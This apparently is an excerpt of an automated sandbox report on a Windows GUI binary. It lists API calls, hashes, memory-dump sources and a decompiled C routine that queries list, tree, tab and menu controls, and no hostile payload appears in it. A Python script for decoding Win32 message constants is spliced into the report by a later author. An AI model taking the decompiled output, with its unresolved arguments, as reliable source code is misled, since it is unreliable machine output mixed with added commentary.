0x00e3cc7b 0x00e3cc7f 0x00e3cc81 0x00000000 0x00000000 0x00e3cc95 0x00e3cc9d 0x00e3cc9f
0x00000000 0x00e3cc9f 0x00e3cbb7 0x00e3cbbc 0x00000000 0x00000000 0x00e3cbc2 0x00e3cbc7
                                          0x00000000
                                          0x00000000
                                          0x00e3cbcd
                                          0x00e3cbd2
                                          0x00e3cbd6
                                          0x00e3cbdc
                                          0x00e3cbe1
                                          0x00000000
                                          0x00000000
                                          0x00e3cbe7
                                          0x00e3cbec
                                          0x00000000
                                          0x00000000
                                          0x00e3cbf2
                                          0x00e3cc00
                                          0x00e3cc06
                                          0x00e3cc08
                                          0x00000000
                                          0x00000000
                                          0x00e3cc0e
                                          0x00e3cc21
                                          0x00e3cc2f
                                          0x00000000
                                          0x00e3cc2f
                                          0x00e3cb10
                                          0x00e3cb95
                                          0x00e3cb9b
                                          0x00e3cb9b
                                          0x00000000
                                          0x00e3cb9b
                                          0x00e3cb17
                                          0x00e3cb6b
                                          0x00e3cb72
                                          0x00e3cb79
                                          0x00000000
                                          0x00e3cb7b
                                          0x00e3cb7b
                                          0x00e3cb82
                                          0x00000000
                                          0x00e3cb82
                                          0x00e3cb79
                                          0x00e3cb1e
                                          0x00e3cb62
                                          0x00000000
                                          0x00e3cb62
                                          0x00e3cb25
                                          0x00e3cb45
                                          0x00e3cb4c
                                          0x00e3cb4e
                                          0x00e3cb4f
                                          0x00e3cb52
                                          0x00e3cb52
                                          0x00e3cb57
                                          0x00000000
                                          0x00e3cb57
                                          0x00e3cb2c
                                          0x00000000
                                          0x00000000
                                          0x00000000

                                          APIs
                                            • Part of subcall function 00DB2612: GetWindowLongW.USER32(?,000000EB), ref: 00DB2623
                                          • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 00E3CB37
                                          • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00E3CB95
                                          • GetWindowLongW.USER32(?,000000F0), ref: 00E3CBD6
                                          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00E3CC00
                                          • SendMessageW.USER32 ref: 00E3CC29
                                          • _wcsncpy.LIBCMT ref: 00E3CC95
                                          • GetKeyState.USER32 ref: 00E3CCB6
                                          • GetKeyState.USER32 ref: 00E3CCC3
                                          • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00E3CCD9
                                          • GetKeyState.USER32 ref: 00E3CCE3
                                          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00E3CD0C
                                          • SendMessageW.USER32 ref: 00E3CD33
                                          • SendMessageW.USER32(?,00001030,?,00E3B348), ref: 00E3CE37
                                          • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 00E3CE4D
                                          • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00E3CE60
                                          • SetCapture.USER32(?), ref: 00E3CE69
                                          • ClientToScreen.USER32(?,?), ref: 00E3CECE
                                          • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 00E3CEDB
                                          • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00E3CEF5
                                          • ReleaseCapture.USER32(?,?,?), ref: 00E3CF00
                                          • GetCursorPos.USER32(?,?,00000001,?,?,?), ref: 00E3CF3A
                                          • ScreenToClient.USER32 ref: 00E3CF47
                                          • SendMessageW.USER32(?,00001012,00000000,?), ref: 00E3CFA3
                                          • SendMessageW.USER32 ref: 00E3CFD1
                                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 00E3D00E
                                          • SendMessageW.USER32 ref: 00E3D03D
                                          • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00E3D05E
                                          • SendMessageW.USER32(?,0000110B,00000009,?), ref: 00E3D06D
                                          • GetCursorPos.USER32(?), ref: 00E3D08D
                                          • ScreenToClient.USER32 ref: 00E3D09A
                                          • GetParent.USER32(?), ref: 00E3D0BA
                                          • SendMessageW.USER32(?,00001012,00000000,?), ref: 00E3D123
                                          • SendMessageW.USER32 ref: 00E3D154
                                          • ClientToScreen.USER32(?,?), ref: 00E3D1B2
                                          • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00E3D1E2
                                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 00E3D20C
                                          • SendMessageW.USER32 ref: 00E3D22F
                                          • ClientToScreen.USER32(?,?), ref: 00E3D281
                                          • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00E3D2B5
                                            • Part of subcall function 00DB25DB: GetWindowLongW.USER32(?,000000EB), ref: 00DB25EC
                                          • GetWindowLongW.USER32(?,000000F0), ref: 00E3D351
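The SendMessageW and GetWindowLongW entries above are printed with raw numeric constants, so a tab-control selection query (0x130B) and a list-view hit test (0x1012) look alike until each number is decoded. The decoder below is an added example written for this page; it is not code from the report, from Joe Sandbox or from the analysed sample. It maps the constants that occur in the listing to their winuser.h/commctrl.h names and flags the base-address collision that makes a bare message number ambiguous: LVM_FIRST, MCM_FIRST and DTM_FIRST are all 0x1000, so 0x1001 is LVM_SETBKCOLOR, MCM_GETCURSEL or DTM_GETSYSTEMTIME depending on the control's window class. The window-class names are the standard common-control class names; treating GetWindowLongW indices printed as 000000EB or 000000F0 as byte-truncated negative indices (GWL_USERDATA, GWL_STYLE) is an assumption about how the report renders them, supported by the full-width 0xffffffec / 0xfffffff0 values in the decompiled C further down.

```python
"""Decode raw Win32 constants from a sandbox API listing (added example).

Not part of the sandbox report. Message numbers are the public winuser.h /
commctrl.h values; the byte-truncation handling for GetWindowLong indices
is an assumption about the report's formatting.
"""
from __future__ import annotations

import re

LVM_FIRST = MCM_FIRST = DTM_FIRST = 0x1000   # three control families share one base
TV_FIRST = 0x1100
TCM_FIRST = 0x1300

# message number -> {window class (None = class independent): symbolic name}
MESSAGES = {
    0x000E: {None: "WM_GETTEXTLENGTH"},
    0x00F0: {"Button": "BM_GETCHECK"},
    LVM_FIRST + 1:  {"SysListView32": "LVM_SETBKCOLOR",
                     "SysMonthCal32": "MCM_GETCURSEL",
                     "SysDateTimePick32": "DTM_GETSYSTEMTIME"},
    LVM_FIRST + 12: {"SysListView32": "LVM_GETNEXTITEM"},
    LVM_FIRST + 18: {"SysListView32": "LVM_HITTEST"},
    LVM_FIRST + 48: {"SysListView32": "LVM_SORTITEMS"},
    LVM_FIRST + 75: {"SysListView32": "LVM_GETITEMW"},
    LVM_FIRST + 83: {"SysListView32": "LVM_FINDITEMW"},
    TV_FIRST + 10:  {"SysTreeView32": "TVM_GETNEXTITEM"},
    TV_FIRST + 11:  {"SysTreeView32": "TVM_SELECTITEM"},
    TV_FIRST + 17:  {"SysTreeView32": "TVM_HITTEST"},
    TV_FIRST + 62:  {"SysTreeView32": "TVM_GETITEMW"},
    TCM_FIRST + 11: {"SysTabControl32": "TCM_GETCURSEL"},
}

# (message name, parameter, value) -> symbolic name of that parameter value
PARAM_HINTS = {
    ("TVM_GETNEXTITEM", "wParam", 0x9): "TVGN_CARET",
    ("TVM_SELECTITEM", "wParam", 0x9): "TVGN_CARET",
    ("LVM_GETNEXTITEM", "lParam", 0x2): "LVNI_SELECTED",
}

GWL_NAMES = {-4: "GWL_WNDPROC", -6: "GWL_HINSTANCE", -8: "GWL_HWNDPARENT",
             -12: "GWL_ID", -16: "GWL_STYLE", -20: "GWL_EXSTYLE",
             -21: "GWL_USERDATA"}


def decode_message(msg: int, window_class: str | None = None) -> list[str]:
    """Candidate names for a message; all candidates when the class is unknown."""
    entry = MESSAGES.get(msg)
    if entry is None:
        return [f"unknown(0x{msg:04x})"]
    if None in entry:
        return [entry[None]]
    if window_class is None:
        return sorted(entry.values())          # ambiguous shared base: list them all
    name = entry.get(window_class)
    return [name] if name else [f"unknown(0x{msg:04x}) for {window_class}"]


def gwl_index(raw: int) -> tuple[int, str]:
    """Normalise a GetWindowLong index printed either byte-truncated or as 32-bit."""
    raw &= 0xFFFFFFFF
    if raw < 0x100 and raw & 0x80:
        value = raw - 0x100                    # assumption: byte-truncated negative index
    elif raw & 0x80000000:
        value = raw - (1 << 32)                # full 32-bit two's complement
    else:
        value = raw
    return value, GWL_NAMES.get(value, f"unknown({value})")


# e.g. "SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00E3CB95"
_CALL = re.compile(r"(\w+)\.(\w+)(?:\(([^)]*)\))?(?:\s*,?\s*ref:\s*([0-9A-Fa-f]+))?")


def _arg(text: str) -> int | None:
    text = text.strip()
    return None if text in ("", "?") else int(text, 16)   # '?' = unresolved by the sandbox


def decode_api_line(line: str, window_class: str | None = None) -> dict:
    """Parse one report line and attach symbolic names for its constants."""
    m = _CALL.search(line)
    if not m:
        return {"api": None, "error": "no call found"}
    api, module, raw_args, ref = m.groups()
    args = [_arg(a) for a in raw_args.split(",")] if raw_args is not None else []
    result = {"api": api, "module": module, "ref": ref, "args": args, "names": [], "hints": []}
    if api == "SendMessageW" and len(args) >= 4 and args[1] is not None:
        result["names"] = decode_message(args[1], window_class)
        for name in result["names"]:
            for pos, arg in (("wParam", args[2]), ("lParam", args[3])):
                hint = PARAM_HINTS.get((name, pos, arg))
                if hint:
                    result["hints"].append(f"{pos}={hint}")
    elif api == "GetWindowLongW" and len(args) >= 2 and args[1] is not None:
        result["names"] = [gwl_index(args[1])[1]]
    return result


SAMPLE_LINES = [  # copied from the API listing of this report
    "• SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00E3CB95",
    "• GetWindowLongW.USER32(?,000000F0), ref: 00E3CBD6",
    "• SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00E3CC00",
    "• SendMessageW.USER32(?,00001012,00000000,?), ref: 00E3CFA3",
    "• SendMessageW.USER32 ref: 00E3CC29",
]


def decode_listing(lines=SAMPLE_LINES, window_class: str | None = None) -> list[dict]:
    return [decode_api_line(line, window_class) for line in lines]


if __name__ == "__main__":
    for r in decode_listing():
        print(r["api"], r["ref"], r["names"], r["hints"])
```

Run without a window class to see every candidate for a shared-base message, then re-run with the class recovered from the surrounding code (for example the TVM_ names only make sense once a SysTreeView32 handle is known) to collapse the list to one name.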
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true
                                          • Associated: 00000001.00000002.938907137.0000000000DB0000.00000002.00020000.sdmp
                                          • Associated: 00000001.00000002.939565216.0000000000E3F000.00000002.00020000.sdmp
                                          • Associated: 00000001.00000002.939707012.0000000000E64000.00000002.00020000.sdmp
                                          • Associated: 00000001.00000002.939771397.0000000000E6E000.00000004.00020000.sdmp
                                          • Associated: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                          • String ID: @GUI_DRAGID$F$pb
                                          • API String ID: 3977979337-96320988
                                          • Opcode ID: 90ef5962362ac165f8de02fdc9c04f8020c4327ddf395303754435f88cdc9e2d
                                          • Instruction ID: a442751f42f2cf63f2c2afae9a965543d3956406e9d120ee81696a7e140d20de
                                          • Opcode Fuzzy Hash: 90ef5962362ac165f8de02fdc9c04f8020c4327ddf395303754435f88cdc9e2d
                                          • Instruction Fuzzy Hash: 2642CC35604240AFDB24CF25D849EAABFE5FF48314F242929F599B72B0C771D844DB92
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 68%
                                          			E00E37DDB(signed int _a4, long _a8, WCHAR* _a12) {
                                          				signed int _v12;
                                          				signed int _v16;
                                          				intOrPtr _v32;
                                          				WCHAR* _v36;
                                          				intOrPtr _v40;
                                          				signed char _v44;
                                          				long _v48;
                                          				void* _v52;
                                          				signed int _v72;
                                          				intOrPtr _v80;
                                          				WCHAR* _v84;
                                          				intOrPtr _v88;
                                          				unsigned int _v92;
                                          				intOrPtr _v96;
                                          				long _v100;
                                          				void* _v104;
                                          				signed short _v114;
                                          				signed short _v118;
                                          				void* _v120;
                                          				char _v124;
                                          				signed int _v128;
                                          				signed int _v140;
                                          				void* _v148;
                                          				void* _v152;
                                          				intOrPtr _v160;
                                          				intOrPtr _v164;
                                          				signed int _v188;
                                          				intOrPtr _v196;
                                          				char _v200;
                                          				void* __ebx;
                                          				void* __edi;
                                          				intOrPtr _t167;
                                          				signed int _t169;
                                          				signed int _t170;
                                          				signed int _t177;
                                          				long _t184;
                                          				signed int _t186;
                                          				void* _t189;
                                          				short _t192;
                                          				WCHAR* _t194;
                                          				signed int _t198;
                                          				long _t214;
                                          				signed int _t220;
                                          				long _t221;
                                          				WCHAR* _t224;
                                          				signed int _t225;
                                          				long _t233;
                                          				signed int _t235;
                                          				signed int _t241;
                                          				signed int _t244;
                                          				long _t246;
                                          				signed int _t248;
                                          				signed int _t255;
                                          				int _t256;
                                          				long _t258;
                                          				long _t260;
                                          				int _t263;
                                          				signed int _t265;
                                          				long _t267;
                                          				signed int _t272;
                                          				long _t274;
                                          				int _t280;
                                          				WCHAR* _t281;
                                          				struct HWND__** _t285;
                                          				WCHAR* _t292;
                                          				signed char _t321;
                                          				signed int _t325;
                                          				WCHAR* _t338;
                                          				signed int _t339;
                                          				signed int _t343;
                                          				signed int _t345;
                                          				signed int _t348;
                                          				signed int _t350;
                                          				void* _t356;
                                          				int _t357;
                                          				long _t361;
                                          				struct HWND__* _t368;
                                          				signed int _t370;
                                          				WCHAR* _t372;
                                          				int _t373;
                                          				signed int _t376;
                                          
                                          				if(E00DB2402(0xe757b0, _a4,  &_v124,  &_v12) != 0) {
                                          					_t167 =  *0xe75824; // 0x1569100
                                          					_t280 = _a8;
                                          					 *_t280 =  *_t280 | 0xffffffff;
                                          					_t285 =  *( *(_t167 + _v12 * 4));
                                          					_v12 = _t285;
                                          					_t169 = _t285[0x24] & 0x000000ff;
                                          					_t368 =  *_t285;
                                          					_a8 = _t368;
                                          					__eflags = _t169 - 0x11;
                                          					if(__eflags > 0) {
                                          						__eflags = _t169 - 0x12;
                                          						if(_t169 == 0x12) {
                                          							__eflags = 0;
                                          							_push(0);
                                          							_push(0);
                                          							_push(0x400);
                                          							L88:
                                          							_t170 = SendMessageW(_t368, ??, ??, ??);
                                          							L89:
                                          							 *_t280 = _t170;
                                          							goto L90;
                                          						}
                                          						__eflags = _t169 - 0x13;
                                          						if(_t169 == 0x13) {
                                          							 *_t280 = SendMessageW(_t368, 0x100c, 0xffffffff, 2);
                                          							E00DD2DE0( &_v104, 0, 0x34);
                                          							_v100 =  *_t280;
                                          							_v104 = 4;
                                          							_t177 = SendMessageW(_a8, 0x104b, 0,  &_v104);
                                          							asm("sbb eax, eax");
                                          							_t170 =  ~_t177 & _v72;
                                          							goto L89;
                                          						}
                                          						__eflags = _t169 - 0x14;
                                          						if(_t169 == 0x14) {
                                          							 *_t280 =  *_t280 | 0xffffffff;
                                          							_a8 = GetWindowLongW(_t285[0xd], 0xffffffec);
                                          							E00DD2DE0( &_v104, 0, 0x34);
                                          							_t370 = _v12;
                                          							_v140 = _a4;
                                          							_v148 = 1;
                                          							_t184 = SendMessageW( *(_t370 + 0x34), 0x1053, 0xffffffff,  &_v148);
                                          							_v100 = _t184;
                                          							__eflags = _t184 - 0xffffffff;
                                          							if(_t184 == 0xffffffff) {
                                          								goto L90;
                                          							}
                                          							__eflags = _a8 & 0x00000004;
                                          							if(__eflags == 0) {
                                          								L81:
                                          								_t281 = E00DD0DB6(_t280, 0, __eflags, 0x2000);
                                          								_v104 = 1;
                                          								_t338 = _t281;
                                          								_v80 = 0xfff;
                                          								_a12 = _t338;
                                          								__eflags = 0 -  *((intOrPtr*)(_t370 + 0x94));
                                          								_t186 = 0;
                                          								while(1) {
                                          									_a4 = _t186;
                                          									_v96 = _t186;
                                          									_push( &_v104);
                                          									_push(0);
                                          									_push(0x104b);
                                          									_push( *(_t370 + 0x34));
                                          									_v84 = _t338;
                                          									if(__eflags >= 0) {
                                          										break;
                                          									}
                                          									SendMessageW();
                                          									_t189 = E00DD2BFC(_a12);
                                          									_v80 = 0xffe;
                                          									__eflags = 0xffe - _t189;
                                          									if(0xffe - _t189 <= 0) {
                                          										L26:
                                          										return _t281;
                                          									}
                                          									_t292 =  &(_t281[E00DD2BFC(_t281)]);
                                          									_t192 =  *0xe757c4; // 0x7c
                                          									 *_t292 = _t192;
                                          									_t292[1] = 0;
                                          									_t194 = CharNextW(_t292);
                                          									_t338 = _t194;
                                          									_a12 = _t194;
                                          									_t186 = _a4 + 1;
                                          									__eflags = _t186 -  *((short*)(_t370 + 0x94));
                                          								}
                                          								SendMessageW();
                                          								goto L26;
                                          							}
                                          							__eflags = _a12;
                                          							if(__eflags == 0) {
                                          								goto L81;
                                          							}
                                          							_v104 = 8;
                                          							_v88 = 0xf000;
                                          							_t198 = SendMessageW( *(_t370 + 0x34), 0x104b, 0,  &_v104);
                                          							__eflags = _t198;
                                          							if(_t198 == 0) {
                                          								goto L90;
                                          							}
                                          							asm("sbb eax, eax");
                                          							_t170 = ( ~((_v92 >> 0xc) - 1) & 0xfffffffd) + 4;
                                          							goto L89;
                                          						}
                                          						__eflags = _t169 - 0x15;
                                          						if(_t169 == 0x15) {
                                          							__eflags = _t285[0x1f] - 4;
                                          							if(_t285[0x1f] != 4) {
                                          								_t170 = E00DB9B3C( &(_t285[0x1c]));
                                          								goto L89;
                                          							}
                                          							_t282 =  &(_t285[0x1c]);
                                          							E00DB9837(_t169,  &(_t285[0x1c]),  &(_t285[0x1c]));
                                          							_t339 = 2;
                                          							_t356 = E00DD0DB6(_t282, 0, __eflags,  ~(0 | __eflags > 0x00000000) | ( *((intOrPtr*)(_t282[2] + 4)) + 0x00000001) * _t339);
                                          							E00DB9837(E00DB9837(_t209, _t282, _t282), _t282, _t282);
                                          							E00DB454E(_t356,  *(_t282[2]),  *((intOrPtr*)(_t282[2] + 4)) + 1);
                                          							return _t356;
                                          						}
                                          						__eflags = _t169 - 0x18;
                                          						if(__eflags <= 0) {
                                          							L72:
                                          							_t214 = SendMessageW(_t368, 0xe, 0, 0);
                                          							_t343 = 2;
                                          							_t100 = _t214 + 1; // 0x1
                                          							_t357 = _t100;
                                          							_t372 = E00DD0DB6(_t280, _t357, __eflags,  ~(0 | __eflags > 0x00000000) | _t357 * _t343);
                                          							GetWindowTextW(_a8, _t372, _t357);
                                          							L13:
                                          							return _t372;
                                          						}
                                          						__eflags = _t169 - 0x1a;
                                          						if(_t169 <= 0x1a) {
                                          							__eflags = _a12;
                                          							_push(0);
                                          							_push(0);
                                          							if(__eflags == 0) {
                                          								_t220 = SendMessageW(_t368, 0xf0, ??, ??);
                                          								 *_t280 = _t220;
                                          								__eflags = _t220;
                                          								if(_t220 == 0) {
                                          									 *_t280 = 4;
                                          								}
                                          								goto L90;
                                          							}
                                          							_t221 = SendMessageW(_t368, 0xe, ??, ??);
                                          							_t345 = 2;
                                          							_t89 = _t221 + 1; // 0x1
                                          							_t373 = _t89;
                                          							_t224 = E00DD0DB6(_t280, 0, __eflags,  ~(0 | __eflags > 0x00000000) | _t373 * _t345);
                                          							_a12 = _t224;
                                          							_t225 = GetWindowTextW(_a8, _t224, _t373);
                                          							__eflags = _t225;
                                          							if(_t225 != 0) {
                                          								return _a12;
                                          							}
                                          							_push(_a12);
                                          							 *_t280 = 0;
                                          							L28:
                                          							L00DD0E2C();
                                          							goto L90;
                                          						}
                                          						__eflags = _t169 - 0x1c;
                                          						if(__eflags != 0) {
                                          							goto L72;
                                          						}
                                          						__eflags = SendMessageW(_t368, 0x1001, 0,  &_v120);
                                          						if(__eflags == 0) {
                                          							 *_t280 = 0;
                                          							goto L90;
                                          						}
                                          						_t372 = E00DD0DB6(_t280, 0, __eflags, 0x16);
                                          						wsprintfW(_t372, L"%d/%02d/%02d", _v120 & 0x0000ffff, _v118 & 0x0000ffff, _v114 & 0x0000ffff);
                                          						goto L13;
                                          					}
                                          					if(__eflags == 0) {
                                          						_v48 = _t285[4];
                                          						 *_t280 = 0;
                                          						_t233 = GetWindowLongW(_t285[0xd], 0xfffffff0);
                                          						__eflags = _a12;
                                          						_a4 = _t233;
                                          						_v52 = 8;
                                          						_v40 = 0xf000;
                                          						if(__eflags == 0) {
                                          							_t235 = SendMessageW( *(_v12 + 0x34), 0x113e, 0,  &_v52);
                                          							__eflags = _t235;
                                          							if(_t235 != 0) {
                                          								_t321 = _v44;
                                          								__eflags = _a4 & 0x00000100;
                                          								if((_a4 & 0x00000100) != 0) {
                                          									asm("sbb eax, eax");
                                          									_t241 = ( ~((_t321 >> 0xc) - 1) & 0xfffffffd) + 4;
                                          									__eflags = _t241;
                                          									 *_t280 = _t241;
                                          								}
                                          								__eflags = _t321 & 0x00000002;
                                          								if((_t321 & 0x00000002) != 0) {
                                          									 *_t280 =  *_t280 | 0x00000100;
                                          									__eflags =  *_t280;
                                          								}
                                          								__eflags = _t321 & 0x00000020;
                                          								if((_t321 & 0x00000020) != 0) {
                                          									 *_t280 =  *_t280 | 0x00000400;
                                          									__eflags =  *_t280;
                                          								}
                                          								__eflags = _t321 & 0x00000010;
                                          								if((_t321 & 0x00000010) != 0) {
                                          									 *_t280 =  *_t280 | 0x00000200;
                                          								}
                                          							}
                                          							goto L90;
                                          						}
                                          						_t281 = E00DD0DB6(_t280, 0, __eflags, 0x2000);
                                          						_push( &_v52);
                                          						_push(0);
                                          						_push(0x113e);
                                          						_push( *(_v12 + 0x34));
                                          						L25:
                                          						_v32 = 0xfff;
                                          						_v36 = _t281;
                                          						_v52 = 1;
                                          						_t244 = SendMessageW(??, ??, ??, ??);
                                          						__eflags = _t244;
                                          						if(_t244 == 0) {
                                          							_push(_t281);
                                          							goto L28;
                                          						}
                                          						goto L26;
                                          					}
                                          					__eflags = _t169 - 0xa;
                                          					if(__eflags > 0) {
                                          						__eflags = _t169 - 0xc;
                                          						if(_t169 == 0xc) {
                                          							 *_t280 =  *_t280 & 0;
                                          							goto L90;
                                          						}
                                          						__eflags = _t169 - 0xd;
                                          						if(__eflags <= 0) {
                                          							goto L72;
                                          						}
                                          						__eflags = _t169 - 0xf;
                                          						if(_t169 <= 0xf) {
                                          							__eflags = IsMenu(_t285[3]);
                                          							if(__eflags == 0) {
                                          								goto L90;
                                          							}
                                          							_t246 = E00DD0DB6(_t280, 0, __eflags, 0x208);
                                          							__eflags = _a12;
                                          							_t361 = _t246;
                                          							_t376 = _v12;
                                          							_a8 = _t361;
                                          							_v200 = 0x30;
                                          							_push( &_v200);
                                          							if(_a12 == 0) {
                                          								_v196 = 1;
                                          								_t248 = GetMenuItemInfoW( *(_t376 + 0xc), _a4, 0, ??);
                                          								_push(_t361);
                                          								__eflags = _t248;
                                          								if(_t248 == 0) {
                                          									goto L28;
                                          								}
                                          								L00DD0E2C();
                                          								_t325 = _v188;
                                          								 *_t280 = _t325;
                                          								asm("sbb eax, eax");
                                          								_t255 = ( ~(_t325 & 0x00000003) & 0x00000040) + 0x40;
                                          								__eflags = _t325 & 0x00008080;
                                          								if((_t325 & 0x00008080) != 0) {
                                          									_t255 = _t255 | 0x00000100;
                                          									__eflags = _t255;
                                          								}
                                          								__eflags = _t325 & 0x00000008;
                                          								if((_t325 & 0x00000008) == 0) {
                                          									_t170 = _t255 | 0x00000004;
                                          									__eflags = _t170;
                                          								} else {
                                          									_t170 = _t255 | 0x00000001;
                                          								}
                                          								__eflags = _t325 & 0x00001000;
                                          								if((_t325 & 0x00001000) != 0) {
                                          									_t170 = _t170 | 0x00000200;
                                          								}
                                          								goto L89;
                                          							}
                                          							_v164 = _t361;
                                          							_v196 = 0x10;
                                          							_v160 = 0x104;
                                          							_t256 = GetMenuItemInfoW( *(_t376 + 0xc), _a4, 0, ??);
                                          							__eflags = _t256;
                                          							if(_t256 != 0) {
                                          								return _a8;
                                          							}
                                          							_push(_a8);
                                          							 *_t280 = 0;
                                          							goto L28;
                                          						}
                                          						__eflags = _t169 - 0x10;
                                          						if(__eflags != 0) {
                                          							goto L72;
                                          						}
                                          						 *_t280 = 0;
                                          						_t258 = SendMessageW(_t368, 0x110a, 9, 0);
                                          						__eflags = _t258;
                                          						if(_t258 == 0) {
                                          							goto L90;
                                          						}
                                          						__eflags = _a12;
                                          						_v48 = _t258;
                                          						_v52 = 4;
                                          						if(__eflags == 0) {
                                          							_t260 = SendMessageW(_t368, 0x113e, 0,  &_v52);
                                          							__eflags = _t260;
                                          							if(_t260 == 0) {
                                          								goto L90;
                                          							}
                                          							_t170 = _v16;
                                          							goto L89;
                                          						}
                                          						_t281 = E00DD0DB6(_t280, 0, __eflags, 0x2000);
                                          						_push( &_v52);
                                          						_push(0);
                                          						_push(0x113e);
                                          						_push(_t368);
                                          						goto L25;
                                          					}
                                          					if(__eflags == 0) {
                                          						_t263 = SendMessageW(_t368, 0x130b, 0, 0);
                                          						__eflags = _a12;
                                          						 *_t280 = _t263;
                                          						if(_a12 == 0) {
                                          							goto L90;
                                          						}
                                          						_v152 = 8;
                                          						SendMessageW(_t368, 0x133c, _t263,  &_v152);
                                          						_t170 = _v128;
                                          						goto L89;
                                          					}
                                          					_t265 = _t169;
                                          					__eflags = _t265;
                                          					if(_t265 == 0) {
                                          						_t280 = SendMessageW(_t368, 0x147, 0, 0);
                                          						__eflags = _t280 - 0xffffffff;
                                          						if(__eflags == 0) {
                                          							goto L72;
                                          						}
                                          						_t267 = SendMessageW(_t368, 0x149, _t280, 0);
                                          						_t348 = 2;
                                          						_t372 = E00DD0DB6(_t280, SendMessageW, __eflags,  ~(0 | __eflags > 0x00000000) | (_t267 + 0x00000001) * _t348);
                                          						_push(_t372);
                                          						_push(_t280);
                                          						_push(0x148);
                                          						L12:
                                          						SendMessageW(_a8, ??, ??, ??);
                                          						goto L13;
                                          					}
                                          					_t272 = _t265 - 1;
                                          					__eflags = _t272;
                                          					if(_t272 == 0) {
                                          						_t280 = SendMessageW(_t368, 0x188, 0, 0);
                                          						__eflags = _t280 - 0xffffffff;
                                          						if(__eflags == 0) {
                                          							goto L72;
                                          						} else {
                                          							_t274 = SendMessageW(_t368, 0x18a, _t280, 0);
                                          							_t350 = 2;
                                          							_t336 =  ~(__eflags > 0) | (_t274 + 0x00000001) * _t350;
                                          							_t372 = E00DD0DB6(_t280, SendMessageW,  ~(__eflags > 0) | (_t274 + 0x00000001) * _t350, _t336);
                                          							_push(_t372);
                                          							_push(_t280);
                                          							_push(0x189);
                                          							goto L12;
                                          						}
                                          					}
                                          					__eflags = _t272 - 7;
                                          					if(__eflags != 0) {
                                          						goto L72;
                                          					} else {
                                          						_push(0);
                                          						_push(0);
                                          						_push(0x408);
                                          						goto L88;
                                          					}
                                          				} else {
                                          					 *_a8 =  *_a8 & 0x00000000;
                                          					L90:
                                          					return 0;
                                          				}
                                          			}

                                          APIs
                                          • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 00E384D0
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true
                                          • Associated: 00000001.00000002.938907137.0000000000DB0000.00000002.00020000.sdmp
                                          • Associated: 00000001.00000002.939565216.0000000000E3F000.00000002.00020000.sdmp
                                          • Associated: 00000001.00000002.939707012.0000000000E64000.00000002.00020000.sdmp
                                          • Associated: 00000001.00000002.939771397.0000000000E6E000.00000004.00020000.sdmp
                                          • Associated: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: MessageSend
                                          • String ID: %d/%02d/%02d
                                          • API String ID: 3850602802-328681919
                                          • Opcode ID: b13f0b19b3959b9b00fc1dbe7ac4e3723743df841ef93f81aff93d9f68839c17
                                          • Instruction ID: 388769dd19eb1878d1cdf3bc0ca9176f2d1d0f42c1914b9595972249b65a6cd1
                                          • Opcode Fuzzy Hash: b13f0b19b3959b9b00fc1dbe7ac4e3723743df841ef93f81aff93d9f68839c17
                                          • Instruction Fuzzy Hash: D112CC71A00309AFEB249F25CE4DFAB7FF8EB45314F10512AF915BA2A1DB709945CB60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true
                                          • Associated: 00000001.00000002.938907137.0000000000DB0000.00000002.00020000.sdmp
                                          • Associated: 00000001.00000002.939565216.0000000000E3F000.00000002.00020000.sdmp
                                          • Associated: 00000001.00000002.939707012.0000000000E64000.00000002.00020000.sdmp
                                          • Associated: 00000001.00000002.939771397.0000000000E6E000.00000004.00020000.sdmp
                                          • Associated: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: _memmove$_memset
                                          • String ID: ]$DEFINE$P\$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)
                                          • API String ID: 1357608183-2476006638
                                          • Opcode ID: 390b22d32359a572dfffa704c629548a5e286092e91606f745590faf955c8a36
                                          • Instruction ID: fd6681a22a9071bda924b0c640d4e7ed2e8502d398b5ead7efd185b21d9c8775
                                          • Opcode Fuzzy Hash: 390b22d32359a572dfffa704c629548a5e286092e91606f745590faf955c8a36
                                          • Instruction Fuzzy Hash: 52939075A04216DBDB24CFA8C881BADB7B1FF48314F24916AE955BB2C1E7709EC1CB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetForegroundWindow.USER32(00000000,?), ref: 00DB48DF
                                          • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00DED665
                                          • IsIconic.USER32 ref: 00DED66E
                                          • ShowWindow.USER32(?,00000009), ref: 00DED67B
